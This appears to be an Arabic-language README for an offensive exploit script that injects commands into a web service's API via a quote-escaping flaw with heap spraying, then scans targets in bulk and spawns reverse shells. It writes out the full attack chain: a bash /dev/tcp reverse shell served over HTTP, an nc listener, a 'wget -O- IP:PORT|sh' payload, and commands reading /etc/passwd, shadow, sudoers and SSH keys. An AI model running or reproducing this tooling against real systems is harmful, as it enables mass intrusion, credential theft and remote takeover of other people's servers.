
يشمل اكتشاف الأوامر القابلة للتنفيذ و getshell بنقرة واحدة (يتطلب نشر خدمة على الخادم)
يشمل اكتشاف الأوامر القابلة للتنفيذ و getShell بنقرة واحدة (يتطلب نشر خدمة على الخادم)
يمكن استخدام pco.yaml مع nuclei للاكتشاف السريع
python go.py
أدخل عنوان URL الهدف ← اختر قائمة الوظائف.
# اكتشاف سريع (8 معلومات أساسية)
python go.py -t https://IP:PORT --probe fast
# اكتشاف عميق (جميع الأوامر: 30+ عنصر)
python go.py -t https://IP:PORT --probe deep
# اكتشاف دفعة
python go.py -f vulnerable_targets.txt --probe fast
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# دفعة متزامنة (20 خيط)
python go.py -f targets.txt -c "hostname" --batch 20
افتح محطتين على جهاز الهجوم:
# المحطة 1 - خدمة HTTP (توفر rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# المحطة 2 - انتظار الارتداد
nc -lvnp 8088
ثم أرسل الحمولة:
# هدف مفرد
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# دفعة (تسلسلي، يمكن استقبال واحد فقط في كل مرة)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
سيقوم السكريبت بطباعة خطوات التحضير قبل الإرسال.
| الفئة | الأمر |
|---|---|
| معلومات أساسية | hostname, uname -a, kernel, OS release, uptime |
| مستخدمون | id, whoami, users/w/who |
| شبكة | ifconfig, route, arp, listening ports, connections, iptables |
| نظام | processes, cpuinfo, meminfo, disk, mount |
| ملفات | ls / /root /tmp /home /etc |
| إعدادات | crontab, passwd, shadow, sudoers, SSH keys |
| إضافات | config search, scripts, docker, containers |
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAA'; <الأمر> #", ...}
apiuser="''''" يُؤدي إلى ثغرة عدم إنهاء escape_quotes() بقيمة nullg0~g60 رش الكومة 61 مرة لزيادة نسبة النجاح'; <الأمر> # يُغلق السياق، و# يُعلق ما يليهبدون استخدام echo tag يُمكن استخدام 34 حرفًا:
wget -O- IP:PORT|sh (31 حرفًا)
سلسلة الأنابيب: wget تحميل → sh تنفيذ → bash ارتداد إلى المنفذ المحدد.
| المعامل | الوظيفة |
|---|---|
-t, --target URL | عنوان الهدف |
-f, --file FILE | ملف قائمة الأهداف |
-l, --lhost IP | عنوان IP لجهاز الهجوم |
-p, --lport PORT | منفذ خدمة HTTP (الافتراضي 8087) |
-n, --ncport PORT | منفذ استماع nc (الافتراضي 8088) |
-c, --cmd CMD | تنفيذ الأمر |
--probe fast/deep | اكتشاف سريع/عميق |
--batch N | عدد المهام المتزامنة (الافتراضي تسلسلي) |